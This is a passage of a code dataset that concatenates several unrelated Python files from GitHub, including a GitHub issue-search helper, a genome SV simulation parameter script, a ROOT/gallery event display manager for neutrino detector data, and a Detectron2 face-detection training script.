torch.LongTensor(\n [i//2 if i % 2 == 0 else i//2+node_len for i in range(node_len+edge_len)])\n x_dec = x_dec.index_select(index=idx, dim=0).view(\n node_len+edge_len, bs, -1).permute(1, 0, 2).contiguous()\n\n n_idx, e_idx = x_idx\n n_mu = torch.stack([n_mu[i].take(n_idx[i]) for i in range(bs)], dim=0)\n n_sigma2 = torch.stack([n_sigma2[i].take(n_idx[i])\n for i in range(bs)], dim=0)\n mintime = torch.stack([self.mintime.take(n_idx[i])\n for i in range(bs)], dim=0)\n e_mu = torch.stack([e_mu[i].take(e_idx[i]) for i in range(bs)], dim=0)\n e_sigma2 = torch.stack([e_sigma2[i].take(e_idx[i])\n for i in range(bs)], dim=0)\n\n decoder_node, src_node_mask, decoder_edge, src_edge_mask = self._transformer(\n x_enc, x_dec, src_mask, n_mu, n_sigma2, e_mu, e_sigma2, mintime)\n return decoder_node, src_node_mask, decoder_edge, src_edge_mask\n","repo_name":"yuanhaitao/STHR_CODE","sub_path":"code/.ipynb_checkpoints/Leim-checkpoint.py","file_name":"Leim-checkpoint.py","file_ext":"py","file_size_in_byte":42951,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"30705054309","text":"# Задайте список. Напишите программу, которая определит, \n# присутствует ли в заданном списке строк некое число.\n\ndef input_list():\n string = input('Введите значения строк через пробел: ').split(' ')\n return string\n\n\ndef find_number(string, number):\n for item in string:\n if number in item:\n print(f'В элементе {item} списка найдено число {number}')\n print(f'Список изучен') \n return\n\n\nstring_list = input_list()\nnum = input('Введите число, которое необходимо найти списке: ')\nprint(string_list)\nfind_number(string_list, num)\n","repo_name":"NazarovIlya/Python","sub_path":"TasksPy/Task020_is_digit_in_list.py","file_name":"Task020_is_digit_in_list.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35677992740","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n# Just in case it's not python 2\ntry:\n import urllib.request as urlrequest\nexcept ImportError:\n import urllib as urlrequest\n\nimport ssl\nimport os\nimport json\nimport time\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\n# Github api\n#\nclass GitHub():\n def __init__(self, no_cache):\n self.sleep_time = 2\n self.url = 'https://api.github.com/search/issues?per_page=100'\n self.no_cache = no_cache\n\n ##\n # Build github query\n #\n # :param query String\n #\n def build_query(self, query):\n return '&q=org:PrestaShop+is:public+-repo:prestashop/prestashop.github.io+' + query\n\n ##\n # Generate github request and return json content\n #\n # :param str query: Represents a GitHub query\n # :param bool is_issue: Is issue or pull request\n #\n def get_json(self, query, is_issue=True):\n query_type = ('is:issue' if is_issue else 'is:pr')\n\n # Debug only\n # print(\n # 'Processing request for query: {query_type}+{query}'.format(\n # query=query,\n # query_type=query_type\n # )\n # )\n\n filename = 'cache/{query}-{query_type}'.format(\n query=query,\n query_type=query_type\n )\n\n if os.path.exists('./' + filename) and not self.no_cache:\n with open(filename, 'r') as f:\n data = f.read()\n else:\n data = urlrequest.urlopen(\n self.url +\n self.build_query(query) +\n '+' +\n query_type\n ).read().decode('utf-8')\n\n with open(filename, 'w') as f:\n f.write(data)\n time.sleep(self.sleep_time)\n\n return json.loads(data)\n","repo_name":"DemoOctober/Python","sub_path":"core_weekly/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42214827243","text":"\n\nimport sys\n\nin_file = sys.argv[1] # GRCh38.d1.vd1.sizes\nout_pref = sys.argv[2]\n\nh_chrom_size = {}\nall_chrom_size = 0\nwith open(in_file,'r') as hin:\n for line in hin:\n line = line.rstrip('\\n')\n F = line.split('\\t')\n \n h_chrom_size[F[0]] = int(F[1])\n all_chrom_size += int(F[1])\n if F[0] == 'chrY':\n break\n \nDUPLICATION_number = 2500\nINDEL_number = 5000\nINVERSION_number = 100\nINV_del_number = 50\nINV_dup_number = 50\n\nl_chrom = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"X\",\"Y\"]\nfor i in l_chrom:\n percentage = h_chrom_size[\"chr\"+i] / all_chrom_size \n dup_mumber = round(DUPLICATION_number * percentage)\n indel_mumber = round(INDEL_number * percentage)\n inv_mumber = round(INVERSION_number * percentage)\n invdel_mumber = round(INV_del_number * percentage)\n invdup_mumber = round(INV_dup_number * percentage)\n \n with open(out_pref+\"_chr\"+i,'w') as hout:\n dup_str = \"DUPLICATION_minimum_length: 100\\nDUPLICATION_maximum_length: 10000\\nDUPLICATION_number: %d\\n\" % dup_mumber\n indel_str = \"INDEL_minimum_length: 100\\nINDEL_maximum_length: 10000\\nINDEL_number: %d\\n\" % indel_mumber\n trans_str = \"TRANSLOCATION_minimum_length: 0\\nTRANSLOCATION_maximum_length: 0\\nTRANSLOCATION_number: 0\\n\"\n inv_str = \"INVERSION_minimum_length: 10\\nINVERSION_maximum_length: 10000\\nINVERSION_number: %d\\n\" % inv_mumber\n invdel_str = \"INV_del_minimum_length: 100\\nINV_del_maximum_length: 10000\\nINV_del_number: %d\\n\" % invdel_mumber\n invdup_str = \"INV_dup_minimum_length: 100\\nINV_dup_maximum_length: 10000\\nINV_dup_number: %d\" % invdup_mumber\n print(dup_str+indel_str+trans_str+inv_str+invdel_str+invdup_str, file=hout)\n\n","repo_name":"ncc-gap/simulation_sv_set","sub_path":"script/make_parameter_file.py","file_name":"make_parameter_file.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2594207298","text":"import os\n\nfrom pyqtgraph.Qt import QtCore\n\nfrom ROOT import gallery\nfrom ROOT import TFile\nfrom ROOT import vector as ROOTvector\nfrom ROOT import string as ROOTstring\n\n# from memory_profiler import profile\n\ntry:\n from event import manager, event\nexcept ImportError:\n from evdmanager.event import manager, event\n\nimport datatypes\n\n\nclass product(object):\n def __init__(self, name, typeName):\n self._name=name.rstrip(\".\")\n self._typeName=typeName\n self._isAssociation=False\n self._associatedProduct=None\n self._producer=None\n self._instance=None\n self._stage=None\n\n self.parse()\n\n def append_producer(self, s):\n self._producer += s\n\n def producer(self):\n return self._producer\n\n def name(self):\n return self._name\n\n def fullName(self):\n return \"{}:{}:{}\".format(self._producer, self._instance, self._stage)\n\n def typeName(self):\n return self._typeName\n\n def isAssociation(self):\n return self._isAssociation\n\n def stage(self):\n return self._stage\n\n # def associationProduct(self):\n # pass\n\n # def reverseAssociationProduct(self):\n # pass\n\n def parse(self):\n tokens=self._name.split('_')\n # Name goes as object_producer_stage\n self._producer=tokens[-3]\n self._instance=tokens[-2]\n self._stage=tokens[-1]\n self._typeName = tokens[0].rstrip('s')\n\n return\n\n\nclass processer(object):\n\n def __init__(self):\n\n # Storing ana units as a map:\n # self._ana_units[data product] -> instance of ana_unit\n self._ana_units = dict()\n pass\n\n # @profile\n def process_event(self, gallery_event):\n # print \"Running ... \"\n for key in self._ana_units:\n # print('Processing', key)\n self._ana_units[key].analyze(gallery_event)\n # print('Size of anaunit after processing', asizeof.asized(self._ana_units[key], detail=2).format())\n\n def add_process(self, data_product, ana_unit):\n if data_product in self._ana_units:\n self._ana_units.pop(data_product)\n self._ana_units.update({data_product : ana_unit})\n return\n\n def remove_process(self, data_product, ana_unit=None):\n if data_product in self._ana_units:\n self._ana_units.pop(data_product)\n return\n\n def get_process(self, data_product):\n if data_product in self._ana_units:\n return self._ana_units[data_product]\n else:\n return None\n\n def get_n_processes(self):\n return len(self._ana_units)\n\n def remove_all_processes(self):\n for data_product in self._ana_units.copy():\n self._ana_units.pop(data_product)\n\n def reset(self):\n self._ana_units = dict()\n\nclass evd_manager_base(manager, QtCore.QObject):\n fileChanged = QtCore.pyqtSignal()\n eventChanged = QtCore.pyqtSignal()\n\n \"\"\"docstring for lariat_manager\"\"\"\n\n def __init__(self, geom, file=None):\n super(evd_manager_base, self).__init__(geom, file)\n manager.__init__(self, geom, file)\n QtCore.QObject.__init__(self)\n # For the larlite manager, need both the ana_processor and\n # the storage manager\n self._processer = processer()\n # self._mgr = fmwk.storage_manager()\n self._data_manager = None\n\n self._keyTable = dict()\n self._drawnClasses = dict()\n\n if file != None:\n self.setInputFiles(file)\n\n self._n_entries = 0\n\n # Toggle whether or not to draw wires:\n self._drawWires = False\n self._drawOpDetWvf = False\n # self._drawParams = False\n # self._drawTruth = False\n\n self._wireDrawer = None\n self._opDetWvfDrawer = None\n # self._truthDrawer = None\n\n # A list that will contain a dictionary with run, subrun, event keys\n self._run_list = []\n\n\n def getAvailableRuns(self):\n '''\n Getter for the available runs\n\n Returns:\n list: A list of all available runs\n '''\n out = []\n for item in self._run_list:\n if item['run'] in out:\n continue\n else:\n out.append(item['run'])\n return out\n\n def getAvailableSubruns(self):\n '''\n Getter for the available subruns\n\n Returns:\n list: A list of all available subruns\n '''\n out = []\n for item in self._run_list:\n if item['subrun'] in out:\n continue\n else:\n out.append(item['subrun'])\n return out\n\n def getAvailableEvents(self):\n '''\n Getter for the available events\n\n Returns:\n list: A list of all available events\n '''\n out = []\n for item in self._run_list:\n if item['event'] in out:\n continue\n else:\n out.append(item['event'])\n return out\n\n\n def pingFile(self, file):\n \"\"\"\n this function opens the file and\n determines what is available to draw\n \"\"\"\n # This function opens the file to see\n # what data products are available\n\n # Open the file\n f = TFile(file)\n e = f.Get(\"Events\")\n\n\n # Get all the (run, subrun, event) IDs\n self._run_list = []\n ev_aux_b = e.GetBranch(\"EventAuxiliary\")\n for i in range(ev_aux_b.GetEntries()):\n ev_aux_b.GetEntry(i)\n ev_aux = e.EventAuxiliary\n self._run_list.append({\n 'run': ev_aux.run(),\n 'subrun': ev_aux.subRun(),\n 'event': ev_aux.event(),\n })\n\n\n # prepare a dictionary of data products\n lookUpTable = dict()\n lookUpTable.update({\"all\" : dict()})\n\n product_list = []\n # Loop over the keys (list of trees)\n for key in e.GetListOfBranches():\n\n if key.GetTypeName() == 'art::EventAuxiliary':\n continue\n\n if \"NuMu\" in key.GetName() and \"Assns\" in key.GetTypeName():\n if \"PFParticle\" in key.GetTypeName():\n continue\n elif \"Assns\" in key.GetTypeName():\n continue\n\n prod=product(key.GetName(), key.GetTypeName())\n\n # if \"NuMu\" in key.GetName():\n # print \"NuMu stage is \" + str(prod.stage())\n # print \"NuMu name is \" + str(prod.fullName())\n # print \"NuMu type name is \" + str(prod.typeName())\n _product = prod._typeName\n\n\n\n\n\n # Add the product to the \"all\" list and\n # also to it's stage list:\n\n # gets three items in thisKeyList, which is a list\n # [dataProduct, producer, 'tree'] (don't care about 'tree')\n # check if the data product is in the dict:\n if _product in lookUpTable['all']:\n # extend the list:\n lookUpTable['all'][_product] += (prod, )\n else:\n lookUpTable['all'].update({_product: (prod,)})\n\n\n if not (prod.stage() in lookUpTable):\n lookUpTable.update({prod.stage() : dict()})\n if _product in lookUpTable[prod.stage()]:\n # extend the list:\n lookUpTable[prod.stage()][_product] += (prod, )\n else:\n lookUpTable[prod.stage()].update({_product: (prod,)})\n\n\n self._keyTable.update(lookUpTable)\n\n f.Close()\n\n return\n\n def setInputFile(self, file):\n f = [file, ]\n self.setInputFiles(f)\n\n # @profile\n def setInputFiles(self, files):\n\n # reset the storage manager and process\n if self._data_manager is not None:\n del self._data_manager\n self._data_manager = None\n\n if files == None:\n return\n\n _file_list = ROOTvector(ROOTstring)()\n\n for file in files:\n # First, check that the file exists:\n try:\n if not os.path.exists(file):\n print(\"\\033[91m ERROR: requested file does not exist. \\033[0m\")\n continue\n except (Exception, e):\n print(e)\n return\n # Next, verify it is a root file:\n if not file.endswith(\".root\"):\n print(\"\\033[91m ERROR: must supply a root file. \\033[0m\")\n continue\n\n # Finally, ping the file to see what is available to draw\n self.pingFile(file)\n if len(self._keyTable['all']) > 0:\n self._hasFile = True\n _file_list.push_back(file)\n\n\n # Have to figure out number of events available\n for _f in _file_list:\n _rf = TFile(str(_f))\n _tree = _rf.Get(\"Events\")\n self._n_entries += _tree.GetEntries()\n _rf.Close()\n\n\n # Create an instance of the data manager:\n if _file_list.size() > 0:\n self._data_manager = gallery.Event(_file_list)\n\n # Open the manager\n self._lastProcessed = -1\n\n self.goToEvent(0)\n\n self.fileChanged.emit()\n\n\n def getStages(self):\n return self._keyTable.keys()\n\n # This function will return all producers for the given product\n def getProducers(self, product, stage = None):\n try:\n if stage is not None:\n return self._keyTable[stage][product]\n else:\n return self._keyTable[\"all\"][product]\n except:\n return None\n\n # This function returns the list of products that can be drawn:\n def getDrawableProducts(self):\n return self._drawableItems.getDict()\n\n # override the run,event,subrun functions:\n def run(self):\n if self._data_manager is None:\n return 0\n return self._data_manager.eventAuxiliary().run()\n\n def event(self):\n if self._data_manager is None:\n return 0\n return self._data_manager.eventAuxiliary().event()\n\n def subrun(self):\n if self._data_manager is None:\n return 0\n return self._data_manager.eventAuxiliary().subRun()\n\n def internalEvent(self):\n return self._event\n\n # override the functions from manager as needed here\n def next(self):\n # print \"Called next\"\n # Check that this isn't the last event:\n if self._event < self._n_entries - 1:\n self.goToEvent(self._event + 1)\n else:\n print(\"On the last event, can't go to next.\")\n\n def prev(self):\n if self._event != 0:\n self.goToEvent(self._event - 1)\n else:\n print(\"On the first event, can't go to previous.\")\n\n def processEvent(self, force=False):\n if self._lastProcessed != self._event or force:\n self._processer.process_event(self._data_manager)\n self._lastProcessed = self._event\n\n def goToEvent(self, event, subrun=None, run=None, force=False):\n # Gallery events don't offer random access\n\n # if rubrun and run are specified, then we are dealing with real (event, subrun, run)\n # not an event index as usual. So first of all go from (event, subrun, run) to event index\n if subrun is not None and run is not None:\n try:\n item = {'run': run, 'subrun': subrun, 'event': event}\n except:\n print('This combination does not exist:', item)\n return\n event = self._run_list.index(item)\n\n\n # Loop through until the event is gotten:\n if event < self._n_entries:\n if event == self._event + 1:\n self._data_manager.next()\n\n else:\n if event > self._event:\n while event != self._data_manager.eventEntry():\n self._data_manager.next()\n else:\n self._data_manager.toBegin()\n while event != self._data_manager.eventEntry():\n self._data_manager.next()\n else:\n print(f\"Selected event is too high. You have requested event {event}, but there is a maximum of {self._n_entries}.\")\n return\n\n self.setEvent(self._data_manager.eventEntry())\n self.processEvent()\n\n # if self._view_manager != None:\n # self._view_manager.drawPlanes(self)\n self.drawFresh()\n self.eventChanged.emit()\n\n\n\nclass evd_manager_2D(evd_manager_base):\n\n # truthLabelChanged = QtCore.pyqtSignal(str)\n filterNoise = False\n\n '''\n Class to handle the 2D specific aspects of viewer\n '''\n\n def __init__(self, geom, file=None):\n super(evd_manager_2D, self).__init__(geom, file)\n self._drawableItems = datatypes.drawableItems()\n\n # this function is meant for the first request to draw an object or\n # when the producer changes\n def redrawProduct(self, informal_type, product, view_manager):\n # print \"Received request to redraw \", product, \" by \",producer\n # First, determine if there is a drawing process for this product:\n if product is None:\n if informal_type in self._drawnClasses:\n self._drawnClasses[informal_type].clearDrawnObjects(self._view_manager)\n self._drawnClasses.pop(informal_type)\n return\n if informal_type in self._drawnClasses:\n self._drawnClasses[informal_type].setProducer(product.fullName())\n self.processEvent(True)\n self._drawnClasses[informal_type].clearDrawnObjects(self._view_manager)\n if informal_type == 'MCTrack' or informal_type == 'Track':\n self._drawnClasses[informal_type].drawObjects(self._view_manager, self._gui._tracksOnBothTPCs)\n else:\n self._drawnClasses[informal_type].drawObjects(self._view_manager)\n return\n\n # Now, draw the new product\n if informal_type in self._drawableItems.getListOfTitles():\n # drawable items contains a reference to the class, so instantiate\n # it\n drawingClass = self._drawableItems.getDict()[informal_type][0](self._geom)\n # Special case for clusters, connect it to the signal:\n # if name == 'Cluster':\n # self.noiseFilterChanged.connect(\n # drawingClass.setParamsDrawing)\n # drawingClass.setParamsDrawing(self._drawParams)\n # if name == 'Match':\n # self.noiseFilterChanged.connect(\n # drawingClass.setParamsDrawing)\n # drawingClass.setParamsDrawing(self._drawParams)\n if informal_type == \"RawDigit\":\n self.noiseFilterChanged.connect(\n drawingClass.runNoiseFilter)\n drawingClass.SetSubtractPdedestal(True)\n\n drawingClass.setProducer(product.fullName())\n self._processer.add_process(product, drawingClass._process)\n self._drawnClasses.update({informal_type: drawingClass})\n # Need to process the event\n self.processEvent(True)\n if informal_type == 'MCTrack' or informal_type == 'Track':\n drawingClass.drawObjects(self._view_manager, self._gui._tracksOnBothTPCs)\n else:\n drawingClass.drawObjects(self._view_manager)\n\n def clearAll(self):\n for recoProduct in self._drawnClasses:\n self._drawnClasses[recoProduct].clearDrawnObjects(\n self._view_manager)\n # self.clearTruth()\n\n def drawFresh(self):\n # # wires are special:\n if self._drawWires:\n self._view_manager.drawPlanes(self)\n self.clearAll()\n # Draw objects in a specific order defined by drawableItems\n order = self._drawableItems.getListOfTitles()\n # self.drawTruth()\n for item in order:\n if item in self._drawnClasses:\n self._drawnClasses[item].drawObjects(self._view_manager)\n\n def getAutoRange(self, plane):\n # This gets the max bounds\n xRangeMax, yRangeMax = super(evd_manager_2D, self).getAutoRange(plane)\n xRange = [999,-999]\n yRange = [99999,-99999]\n for process in self._drawnClasses:\n x, y = self._drawnClasses[process].getAutoRange(plane)\n # Check against all four of the parameters:\n if x is not None:\n if x[0] < xRange[0]:\n xRange[0] = x[0]\n if x[1] > xRange[1]:\n xRange[1] = x[1]\n if y is not None:\n if y[0] < yRange[0]:\n yRange[0] = y[0]\n if y[1] > yRange[1]:\n yRange[1] = y[1]\n\n # Pad the ranges by 1 cm to accommodate\n padding = 5\n xRange[0] = max(xRangeMax[0], xRange[0] - padding/self._geom.wire2cm())\n xRange[1] = min(xRangeMax[1], xRange[1] + padding/self._geom.wire2cm())\n yRange[0] = max(yRangeMax[0], yRange[0] - padding/self._geom.time2cm())\n yRange[1] = min(yRangeMax[1], yRange[1] + padding/self._geom.time2cm())\n return xRange, yRange\n\n def get_products(self, name, stage=None):\n '''\n Returns all available products\n '''\n if stage is None:\n stage = 'all'\n\n if stage not in self._keyTable:\n return None\n\n if name not in self._keyTable[stage]:\n return None\n\n return self._keyTable[stage][name]\n\n def get_default_products(self, name, stage=None):\n '''\n Returns only the products that will be\n drawn by default, unless the user decides what to see\n in the dropdown menu\n '''\n if stage is None:\n stage = 'all'\n\n if stage not in self._keyTable:\n return None\n\n if name not in self._keyTable[stage]:\n return None\n\n if self._geom.name() == 'icarus' and len(self._keyTable[stage][name]) > 3:\n default_products = [self._keyTable[stage][name][0],\n self._keyTable[stage][name][1],\n self._keyTable[stage][name][2],\n self._keyTable[stage][name][3]]\n else:\n default_products = [self._keyTable[stage][name][0]]\n\n return default_products\n\n # handle all the wire stuff:\n def toggleWires(self, product, stage=None, subtract_pedestal=True, producers=None):\n # Now, either add the drawing process or remove it:\n\n if stage is None:\n stage = 'all'\n\n if product == 'wire':\n if 'recob::Wire' not in self._keyTable[stage]:\n print(\"No wire data available to draw\")\n self._drawWires = False\n return\n self._drawWires = True\n self._wireDrawer = datatypes.recoWire(self._geom)\n\n if producers is not None:\n producer = producers\n elif self._geom.name() == 'icarus' and len(self._keyTable[stage]['recob::Wire']) > 3:\n producer = [self._keyTable[stage]['recob::Wire'][0].fullName(),\n self._keyTable[stage]['recob::Wire'][1].fullName(),\n self._keyTable[stage]['recob::Wire'][2].fullName(),\n self._keyTable[stage]['recob::Wire'][3].fullName()]\n else:\n producer = self._keyTable[stage]['recob::Wire'][0].fullName()\n\n # self._wireDrawer.setProducer(self._keyTable[stage]['recob::Wire'][0].fullName())\n self._wireDrawer.setProducer(producer)\n self._processer.add_process(\"recob::Wire\",self._wireDrawer._process)\n self.processEvent(True)\n\n elif product == 'rawdigit':\n if 'raw::RawDigit' not in self._keyTable[stage]:\n print(\"No raw digit data available to draw\")\n self._drawWires = False\n return\n self._drawWires = True\n self._wireDrawer = datatypes.rawDigit(self._geom)\n self._wireDrawer.setSubtractPedestal(subtract_pedestal)\n\n if producers is not None:\n producer = producers\n elif self._geom.name() == 'icarus' and len(self._keyTable[stage]['raw::RawDigit']) > 3:\n producer = [self._keyTable[stage]['raw::RawDigit'][0].fullName(),\n self._keyTable[stage]['raw::RawDigit'][1].fullName(),\n self._keyTable[stage]['raw::RawDigit'][2].fullName(),\n self._keyTable[stage]['raw::RawDigit'][3].fullName()]\n else:\n producer = self._keyTable[stage]['raw::RawDigit'][0].fullName()\n\n self._wireDrawer.setProducer(producer)\n self._processer.add_process(\"raw::RawDigit\", self._wireDrawer._process)\n self._wireDrawer.toggleNoiseFilter(self.filterNoise)\n\n self.processEvent(True)\n else:\n if 'raw::RawDigit' in self._processer._ana_units.keys():\n self._processer.remove_process('raw::RawDigit')\n if 'recob::Wire' in self._processer._ana_units.keys():\n self._processer.remove_process('recob::Wire')\n self._wireDrawer = None\n self._drawWires = False\n\n def toggleNoiseFilter(self, filterBool):\n self.filterNoise = filterBool\n if 'raw::RawDigit' in self._processer._ana_units.keys():\n self._wireDrawer.toggleNoiseFilter(self.filterNoise)\n # Rerun the event just for the raw digits:\n self.processEvent(force=True)\n self.drawFresh()\n\n def toggleOpDetWvf(self, product, stage=None):\n\n if stage is None:\n stage = 'all'\n\n if product == 'opdetwaveform':\n\n if 'raw::OpDetWaveform' not in self._keyTable[stage]:\n print(\"No OpDetWaveform data available to draw\")\n self._drawWires = False\n return\n self._drawOpDetWvf = True\n self._opDetWvfDrawer = datatypes.opdetwaveform(self._geom)\n self._opDetWvfDrawer.setProducer(self._keyTable[stage]['raw::OpDetWaveform'][0].fullName())\n self._processer.add_process(\"raw::OpDetWaveform\",self._opDetWvfDrawer._process)\n self.processEvent(True)\n\n\n def getPlane(self, plane, cryo=0):\n if self._drawWires:\n return self._wireDrawer.getPlane(plane, cryo)\n\n def getOpDetWvf(self):\n if self._drawOpDetWvf:\n return self._opDetWvfDrawer.getData()\n\n def hasWireData(self):\n if self._drawWires:\n return True\n else:\n return False\n\n def hasOpDetWvfData(self):\n if self._drawOpDetWvf:\n return True\n else:\n return False\n\n def drawHitsOnWire(self, plane, wire, tpc):\n if not 'Hit' in self._drawnClasses:\n return\n else:\n # Get the right plane number\n this_plane = plane\n if tpc == 1:\n this_plane = self._geom.planeMix()[plane][0]\n\n # Get the hits:\n hits = self._drawnClasses['Hit'].getHitsOnWire(this_plane, wire)\n self._view_manager.drawHitsOnPlot(hits)\n\n\ntry:\n import pyqtgraph.opengl as gl\n\n class evd_manager_3D(evd_manager_base):\n\n \"\"\"This class handles file I/O and drawing for 3D viewer\"\"\"\n\n showMCCosmic = True\n\n def __init__(self, geom, file=None):\n super(evd_manager_3D, self).__init__(geom, file)\n self._drawableItems = datatypes.drawableItems3D()\n\n def getAutoRange(self):\n pass\n\n # this function is meant for the first request to draw an object or\n # when the producer changes\n def redrawProduct(self, name, product, producer, view_manager, stage = None):\n # print \"Received request to redraw \", product, \" by \",producer, \" with name \", name\n # First, determine if there is a drawing process for this product:\n if stage is None:\n stage = 'all'\n if producer is None:\n if name in self._drawnClasses:\n self._drawnClasses[name].clearDrawnObjects(self._view_manager)\n self._drawnClasses.pop(name)\n return\n if name in self._drawnClasses:\n self._drawnClasses[name].setProducer(producer)\n self.processEvent(True)\n self._drawnClasses[name].clearDrawnObjects(self._view_manager)\n self._drawnClasses[name].drawObjects(self._view_manager)\n return\n\n\n # Now, draw the new product\n if name in self._drawableItems.getListOfTitles():\n # drawable items contains a reference to the class, so\n # instantiate it\n drawingClass=self._drawableItems.getDict()[name][0]()\n # Special case for clusters, connect it to the signal:\n # if name is 'PFParticle':\n # self.noiseFilterChanged.connect(\n # drawingClass.setParamsDrawing)\n # drawingClass.setParamsDrawing(self._drawParams)\n # if name == 'Match':\n # self.noiseFilterChanged.connect(\n # drawingClass.setParamsDrawing)\n # drawingClass.setParamsDrawing(self._drawParams)\n\n drawingClass.setProducer(producer)\n self._processer.add_process(product, drawingClass._process)\n self._drawnClasses.update({name: drawingClass})\n if name == \"MCTrack\":\n self._drawnClasses[name].toggleMCCosmic(self.showMCCosmic)\n # Need to process the event\n self.processEvent(True)\n drawingClass.drawObjects(self._view_manager)\n\n def clearAll(self):\n for recoProduct in self._drawnClasses:\n self._drawnClasses[recoProduct].clearDrawnObjects(\n self._view_manager)\n\n # def toggleParams(self, paramsBool):\n # self._drawParams=paramsBool\n # self.noiseFilterChanged.emit(paramsBool)\n # if 'PFParticle' in self._drawnClasses:\n # self.drawFresh()\n\n def drawFresh(self):\n # # wires are special:\n # if self._drawWires:\n # self._view_manager.drawPlanes(self)\n self.clearAll()\n # Draw objects in a specific order defined by drawableItems\n order=self._drawableItems.getListOfTitles()\n for item in order:\n if item in self._drawnClasses:\n self._drawnClasses[item].drawObjects(self._view_manager)\n\n def toggleMCCosmic(self, toggleBool):\n self.showMCCosmic = toggleBool\n order=self._drawableItems.getListOfTitles()\n for item in order:\n if item == \"MCTrack\":\n if item in self._drawnClasses:\n self._drawnClasses[item].toggleMCCosmic(toggleBool)\n self._drawnClasses[item].clearDrawnObjects(self._view_manager)\n self.processEvent(True)\n self._drawnClasses[item].drawObjects(self._view_manager)\n #self.drawFresh()\n\nexcept:\n pass\n","repo_name":"TITUS-EVD/gallery-framework","sub_path":"UserDev/EventDisplay/python/evdmanager/evdmanager.py","file_name":"evdmanager.py","file_ext":"py","file_size_in_byte":27479,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"37667070300","text":"\"\"\"\nWe trained our model on Google Colab with a subscription to Google Colab Pro+ and gained access to a high-end GPU which\nshortened the training time significantly. The link to the python notebook on Google Colab is attached below.\nhttps://colab.research.google.com/drive/1jBf1FECDkiGMPl0EorSVa7OcFVUfA2m7?usp=sharing\n\nNote that you can also run the training code on your local device if you have a high-end GPU which will produce the\nsame output.\n\"\"\"\n\n\nimport os\n\nfrom detectron2 import model_zoo\nfrom detectron2.config import get_cfg\nfrom detectron2.data import DatasetCatalog, MetadataCatalog\nfrom detectron2.engine import DefaultTrainer\nfrom detectron2.evaluation import COCOEvaluator\nfrom detectron2.utils.logger import setup_logger\n\nfrom custom_datasets_conversion import create_annotations_data_frame, convert_dataset_dicts\n\n\nclass CocoTrainer(DefaultTrainer):\n \"\"\"\n This is a custom trainer class that inherits the default trainer class of Detectron2 for model training purpose.\n \"\"\"\n @classmethod\n def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n os.makedirs('coco_evaluation', exist_ok=True)\n output_folder = 'coco_evaluation'\n\n return COCOEvaluator(dataset_name, cfg, False, output_folder)\n\n\n# Enable Detectron2 logger to generate output in terminal for debugging purpose\nsetup_logger()\n\n# Initialize the 'face' class for object detection\nclasses = ['face']\n\n# Create data frame for training and validation steps during model training for DroneFace and Person Faces datasets\ndroneFace_training_data_frame = create_annotations_data_frame('../droneFace_dataset/train/_annotations.coco.json', 'face')\ndroneFace_validation_data_frame = create_annotations_data_frame('../droneFace_dataset/valid/_annotations.coco.json', 'face')\n\nperson_faces_training_data_frame = create_annotations_data_frame('../person_faces_dataset/train/_annotations.coco.json', 'face')\nperson_faces_validation_data_frame = create_annotations_data_frame('../person_faces_dataset/valid/_annotations.coco.json', 'face')\n\n# Register training and validation datasets and its respective metadata\nfor i in ['train', 'valid']:\n DatasetCatalog.register('droneFace_' + i + '_dataset', lambda i=i: convert_dataset_dicts(\n droneFace_training_data_frame if i == 'train' else droneFace_validation_data_frame, classes,\n '../droneFace_dataset/' + i))\n MetadataCatalog.get('droneFace_' + i + '_dataset').set(thing_classes=classes)\n\n DatasetCatalog.register('person_faces_' + i + '_dataset', lambda i=i: convert_dataset_dicts(\n person_faces_training_data_frame if i == 'train' else person_faces_validation_data_frame, classes,\n '../person_faces_dataset/' + i))\n MetadataCatalog.get('person_faces_' + i + '_dataset').set(thing_classes=classes)\n\n# Initialize settings for training\ncfg = get_cfg()\n\n# Here we are using COCO Instance Segmentation Baselines with Mask R-CNN (R50-FPN) pre-trained model from Detectron2\n# Model Zoo\n# https://github.com/facebookresearch/detectron2/blob/main/configs/COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\ncfg.merge_from_file(model_zoo.get_config_file('COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml'))\ncfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url('COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml')\n\n# Assign registered datasets in config setting\ncfg.DATASETS.TRAIN = ('droneFace_train_dataset', 'person_faces_train_dataset')\ncfg.DATASETS.TEST = ('droneFace_valid_dataset', 'person_faces_valid_dataset')\n\n# The config attributes below are fine-tuned for our face detection model\ncfg.DATALOADER.NUM_WORKERS = 1\ncfg.SOLVER.BASE_LR = 0.0005\ncfg.SOLVER.WARMUP_ITERS = 2075\n# Total training images - 4150\ncfg.SOLVER.IMS_PER_BATCH = 4\ncfg.SOLVER.MAX_ITER = 20750\ncfg.SOLVER.STEPS = [8300, 9337, 10374, 11411, 12448, 13485, 14522, 15559, 16596, 17633]\ncfg.SOLVER.GAMMA = 0.6\ncfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128\ncfg.MODEL.ROI_HEADS.NUM_CLASSES = len(classes)\ncfg.TEST.EVAL_PERIOD = 4150\n# cfg.MODEL.DEVICE = 'cpu' # Uncomment this line if your device does not have a CUDA compatible GPU\n\nos.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n\n# Initialise COCO trainer and start training with the registered training dataset\ntrainer = 